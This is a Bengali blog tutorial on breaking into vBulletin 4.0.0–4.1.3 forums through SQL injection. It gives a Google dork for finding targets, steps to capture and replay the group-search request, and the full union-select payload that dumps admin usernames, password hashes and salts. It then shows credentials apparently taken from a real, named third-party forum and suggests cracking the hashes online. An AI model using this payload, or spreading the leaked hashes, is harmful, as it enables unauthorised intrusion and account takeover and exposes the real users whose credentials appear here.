সালাম জানিয়র শুরু করছি আজকের টুট...

আসলে আমি কোন প্রফেসোনাল ব্লগার না। সেজন্যে আমার লেখায় তেমন রস টস নাই... 😀

সুতারাং অনেকের ই ভালো লাগার কথা নয়। সুতারাং যাদের কাছে ভালো লাগবেনা দয়া করে তারা কমেন্ট

দিবেন না। কারন এর চেয়ে ভালো আমার দারা সম্ভব না। 😀

আজকে আমি লিখবো কি করে ভি বুলেটিন দিয়ে বানানো ফোরাম হ্যাক করা যায়। আর হ্যা, এই লেখা শুধুমাত্র

শেখার জন্যে। অন্য কোন উদ্যেশ্যে ব্যাবহার করলে নিজের দায়িত্তে করবেন।

আসুন তাহোলে শুরু করা যাকঃ

আমার দেয়া হ্যাকিং পন্থা টা কাজ করবেঃ Vbulletin 4.0.0 =>>  4.1.3 (4.1.4 বা তার

উপরের ভার্সনে কাজ করবে না।

গুগল ডর্কঃ Powered By Vbulletin 4.1.0 (আথবা অন্য ভার্সন)

যা যা লাগবেঃ 

১। মজিলা ফায়ারফক্স

২। মজিলা  addon Http Header (ডাউনলোড করুন এখান থেকে, https://addons.mozilla.org/en-US/firefox/addon/live-http-headers/

৩। আল্লাহ প্রদত্ত সবচেয়ে বড় টুলস "ব্রেইন"।  😛

গুগল এর সাহাজ্যে Vuln. সাইট খুজে বের করুন।

আমি করেছি, http://www.carrito.net/board

টার্গেট সাইট...

এবার আপনার টার্গেট সাইটে একটা একাউন্ট খুলে ফেলুন।

মেনু থেকে গ্রুপ এ ক্লিক করুন। নিচের ছবির মত।

গ্রুপ মেনু থেকে যে কোন একটি গ্রুপের নাম কপি করুন। যদি কোন গ্রুপ না থাকে তাহলে একটি গ্রুপ Create

করুন "Create Group" এ ক্লিক করে। নিচের ছবির মত। আমার ভাগ্য ভালো যে আমার টার্গেট

সাইটে কিছু গ্রুপ আগে থেকেই তৈরি করা ছিলো। তাই আমি "romba" নামক গ্রুপটির নাম কপি করেছি।

এবার Advanced Search এ যান। নিচের ছবিতে নির্দেসিত।

Search Types: এ Groups এ টিক চিনহ দিন।

Keyword(s): এ আপনার গ্রুপ এর নাম দিন। (আমি দিয়েছি  romba)

Exact name এ টিক দিন।

না বুঝতে পারলে নিচের ছবিটি দেখুন।

এবার ফায়ারফক্স এর মেনু থেকে Tools>>Live Http Headers এ ক্লিক করুন।

টার্গেট সাইটের Search Now বাটনে ক্লিক করুন।

টাস্কবার থেকে Live HTTP Headers অপেন করুন।

HTTP Headers এর মধ্যে থেকে type%5B5D=.............. খুজে বের করুন। না বুঝলে নিচের

ছবিটি দেখুন।

খুজে পেলে ওইটুকু সিলেক্ট করে ReplY তে ক্লিক করুন। নিচের ছবির মত উইন্ডো ওপেন হবে।

"=" এর পরে যেখানে শেষ হয়েছে সেখানে নিচের কোডটি কপি করে পেস্ট করুন। এবং Reply এ ক্লিক করুন।

&cat[0]=1) union+select+group_concat(userid,0x3a,username,0x3a,password,0x3a,salt,usergroupid) from user where  usergroupid=6#

ছবিটা দেখে নিন। সহজেই বুঝবেন।

হ্যা আমরা প্রায় শেষ প্রান্তে এসে গেছি।

নিচের ছবিতি দেখে নিন আগে। আমরা Admin id and Pass পেয়ে গেছি।

আমার টার্গেট সাইট এ যেটা পেলাম...

Search:Type: Groups; Keyword(s): romba; : Uncategorized, 11403:PacoPH:e3f3de08ff50de3f77eb4fbb7c0ae9e1:!YS6,24169:3Fl24ilV:0c1bcad862e034842962380e9cdd520c:,Y~6,26060:CIVIC turbo WEST:5226f7c8e1815cae6632d04477b5e1c2:GT~6,42738:osva:a50660376692f9b614b9df5a71c59ecf:)+N6

USer name:PacoPH
Hash: e3f3de08ff50de3f77eb4fbb7c0ae9e1
SaLt: !YS6,24169:3Fl24ilV

Admin Id: PacoPH

Password: e3f3de08ff50de3f77eb4fbb7c0ae9e1

বি.দ্র. এখানে পাসোয়ারড টি MD5 encoded অবস্থায় আছে এটাকে ডিকোড করতে পারেন
বিভিন্ন সফটওয়্যার দিয়ে অথবা অনেক ওয়েবসাইট আছে যারা ফ্রি তে ডিকোড করার সেবা দিয়ে থাকে।

সবশেষে সবাইকে আমাদের ফোরাম WWW.BDHACKERZ.COM.NU থ্রক্র ঘুরে আসার জন্যে অনুরধ রইলো